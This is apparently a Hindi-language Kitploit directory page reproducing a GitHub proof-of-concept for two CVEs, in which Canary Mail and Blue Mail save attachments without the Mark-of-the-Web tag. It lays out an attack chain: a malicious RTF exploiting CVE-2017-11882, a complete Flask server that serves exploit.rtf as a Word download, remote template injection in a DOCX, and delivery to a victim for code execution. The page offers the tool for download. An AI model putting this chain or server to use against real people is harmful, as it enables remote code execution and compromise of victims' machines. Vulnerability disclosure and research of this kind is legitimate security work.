Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-65318-and-CVE-2025-65319 — Canary Mail या Blue mail का उपयोग करते समय असुरक्षित अनुलग्नक संभालना | Kitploit
उपकरण/GitHubGitHub/bbaboha/cve-2025-65318-and-cve-2025-65319
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubbbaboha/cve-2025-65318-and-cve-2025-65319

CVE-2025-65318-and-CVE-2025-65319

Canary Mail या Blue mail का उपयोग करते समय असुरक्षित अनुलग्नक संभालना

रिपॉजिटरी देखें
728 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-65318 और CVE-2025-65319 के लिए PoC

  • CVE-2025-65318 (BDU:2025-13740): अटैचमेंट इंटरैक्शन कार्यक्षमता का उपयोग करते समय, Canary Mail 5.1.40 और उससे नीचे के संस्करण दस्तावेज़ों को Mark-of-the-Web टैग के बिना फ़ाइल सिस्टम में सहेजते हैं, जो हमलावरों को Windows OS और तृतीय-पक्ष सॉफ़्टवेयर दोनों के अंतर्निहित फ़ाइल सुरक्षा तंत्रों को बायपास करने की अनुमति देता है।
  • CVE-2025-65319 (BDU:2025-13739): अटैचमेंट इंटरैक्शन कार्यक्षमता का उपयोग करते समय, Blue Mail 1.140.103 और उससे नीचे के संस्करण दस्तावेज़ों को Mark-of-the-Web टैग के बिना फ़ाइल सिस्टम में सहेजते हैं, जो हमलावरों को Windows OS और तृतीय-पक्ष सॉफ़्टवेयर दोनों के अंतर्निहित फ़ाइल सुरक्षा तंत्रों को बायपास करने की अनुमति देता है।

अवलोकन

मुख्य समस्या यह नहीं है कि उपयोगकर्ता दुर्भावनापूर्ण अटैचमेंट खोलते हैं, बल्कि यह है कि Canary Mail या Blue Mail जैसे ऐप्स उन्हें सहेजने या खोलने के लिए एक सुविधाजनक लेकिन असुरक्षित सुविधा प्रदान करते हैं। मैं इसे एक सुरक्षा कमजोरी मानता हूं जो उपयोगकर्ताओं को हमलावरों के सामने उजागर करती है।

CWE-693 - सुरक्षा तंत्र विफलता

प्रमाण (PoC)

"Open with" या "Save as" डायलॉग बॉक्स के माध्यम से Office Word अटैचमेंट के असुरक्षित खोलने को प्रदर्शित करने के लिए, Office Word 16 और उससे नीचे के लिए समीकरण संपादक में CVE-2017-11882 कमजोरी का उपयोग किया गया।

  1. हमलावर के होस्ट पर एक दुर्भावनापूर्ण RTF ऑब्जेक्ट बनाएं जो स्क्रिप्ट का उपयोग करके होस्ट पर कैलकुलेटर खोलता है।
  • रिमोट टेम्पलेट इंजेक्शन का उपयोग करके दुर्भावनापूर्ण RTF दस्तावेज़ भेजने के लिए एक सर्वर तैनात करें।
  • root@kitploit:~
    from flask import Flask, send_file, request
    import logging
    from datetime import datetime
    
    app = Flask(__name__)
    
    # Configure logging
    logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
    logger = logging.getLogger(__name__)
    
    @app.before_request
    def log_request_info():
        logger.info(f'Request: {request.method} {request.url} from {request.remote_addr}')
    
    @app.after_request
    def log_response_info(response):
        logger.info(f'Response: Status {response.status_code} for {request.url}')
        return response
    
    @app.route('/download')
    def download_file():
        try:
            response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
            logger.info('File download successful')
            return response
        except FileNotFoundError:
            logger.error('File exploit.rtf not found')
            return 'File not found', 404
    
    if __name__ == '__main__':
        app.run(debug=False, host='0.0.0.0', port=5000)
    
    
    1. एक मनमाना DOCX दस्तावेज़ बनाएं और उदाहरण के लिए, एक PowerShell स्क्रिप्ट चलाकर रिमोट टेम्पलेट इंजेक्शन का उपयोग करें।
    2. हमलावर परिणामी दुर्भावनापूर्ण DOCX दस्तावेज़ पीड़ित को भेजता है।
    3. पीड़ित Canary Mail/Blue Mail में "Open with" या "Save as" फ़ंक्शन का उपयोग करके दुर्भावनापूर्ण दस्तावेज़ खोलता है।
    4. दुर्भावनापूर्ण दस्तावेज़ खोलने पर, पीड़ित बिना कोई अतिरिक्त बटन दबाए समझौता किया जा सकता है।

    प्रभाव

    पुराने Microsoft Office Word सॉफ़्टवेयर संस्करण 16 और उससे नीचे का उपयोग करने वाले उपयोगकर्ताओं के लिए एक संभावित RCE

    प्रभावित संस्करण

    • Canary Mail 5.1.40 और उससे नीचे
    • Blue Mail 1.140.103 और उससे नीचे

    वीडियो प्रमाण (PoC)

    CVE-2025-65318

    https://github.com/user-attachments/assets/fc99d603-f56f-451b-a9f2-821422feef61

    CVE-2025-65319

    https://github.com/user-attachments/assets/68b638b9-e906-4c78-baae-84a369f807f3

    संदर्भ

    • https://bdu.fstec.ru/vul/2025-13739
    • https://bdu.fstec.ru/vul/2025-13740

    अस्वीकरण

    यह रिपॉजिटरी केवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान के लिए है

    टूल डाउनलोड करें